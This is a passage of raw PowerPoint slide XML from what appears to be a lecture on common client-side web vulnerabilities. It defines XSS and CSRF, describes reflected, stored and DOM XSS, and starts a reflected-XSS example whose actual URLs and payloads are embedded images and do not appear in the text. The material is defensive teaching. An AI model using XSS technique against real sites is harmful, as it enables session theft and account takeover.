              <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>It’s the side responsible for processing requests made by the client side, storing and managing data, interacting with databases, handling API endpoints, authenticating users and more.	 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189395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3A454A-557E-2F1B-4701-7328B5F7B509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143867" y="466875"/>
            <a:ext cx="9059768" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24272C"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Common client side vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="3600" b="1" spc="120" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24272C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" panose="00000500000000000000" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51923EB0-3936-B158-8ED3-27059A73D396}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="292971" y="1768421"/>
            <a:ext cx="11683681" cy="4102405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Today we will explore:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Cross site scripting (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>XSS) –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> An attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>manipulates a vulnerable web application so that it returns and executes malicious JavaScript on other user’s browsers.</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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Cross Site Request Forgery </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>CSRF) –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> An attacker induces users to perform actions on the website which they did not intend.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Other client side vulnerabilities (which we will not discuss today) include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Clickjacking, CORS misconfiguration, client-side prototype pollution and more.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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EE060FD5-2930-AF70-95FE-EC8394D9ACDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="292971" y="6365895"/>
            <a:ext cx="6097218" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="30" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Handjet Square Single" pitchFamily="2" charset="0"/>
                <a:cs typeface="Handjet Square Single" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Common client side vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-IL" sz="1200" spc="30" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Handjet Square Single" pitchFamily="2" charset="0"/>
              <a:cs typeface="Handjet Square Single" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9991646-87D7-3A72-4C65-2C52A915742E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9000489" y="6377732"/>
            <a:ext cx="2717380" cy="221561"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="83976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3"/>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42106"/>
            <a:ext cx="7850011"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Cross Site Scripting (XSS)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Cross Site Scripting (XSS)</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4"/>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292971" y="1545612"/>
            <a:ext cx="11444790" cy="4769254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>As said before, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>XSS is simply a fancy name for JavaScript injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900"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342900" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>There are a few types of XSS, the main ones being:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Reflected XSS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Arises when an application receives data in a request and includes (“reflects”) the that same data in it’s response in an unsafe way.</a:t>
            </a:r>
          </a:p>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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Stored XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>The malicious input is stored on the server rather than immediately reflected, and is executed upon every request for it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"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r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>DOM XSS – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Occurs when user controlled data is inserted into the website DOM in an unsafe way.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>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a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16091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028198"/>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403620"/>
            <a:ext cx="7850011"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Example – Reflected XSS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latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Example – Reflected XSS</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3"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9000489" y="6377732"/>
            <a:ext cx="2717380" cy="221561"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D33F90E-E50A-4C6D-837E-A7B1D45E5C15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="124357" y="1195605"/>
            <a:ext cx="11923775" cy="5102679"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Suppose a website has a search functionality which receives the user-supplied search term in a URL parameter:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>The server process the request and the search term, and then responds by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>echoing it in a way:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>An attacker could then construct a malicious URL and send it to a victim:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>An the server will return:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Which is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>valid HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B76EC9B6-F013-4914-98E9-A1324A5A33A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="675088" y="2009486"/>
            <a:ext cx="10145323" cy="394194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ECCA25D-94A3-410D-9E9D-577B29B0D524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029968" y="3227237"/>
            <a:ext cx="7699248" cy="597555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E49809A-5201-4713-ADCE-BF6887885DCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect t="10090" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766281" y="4322454"/>
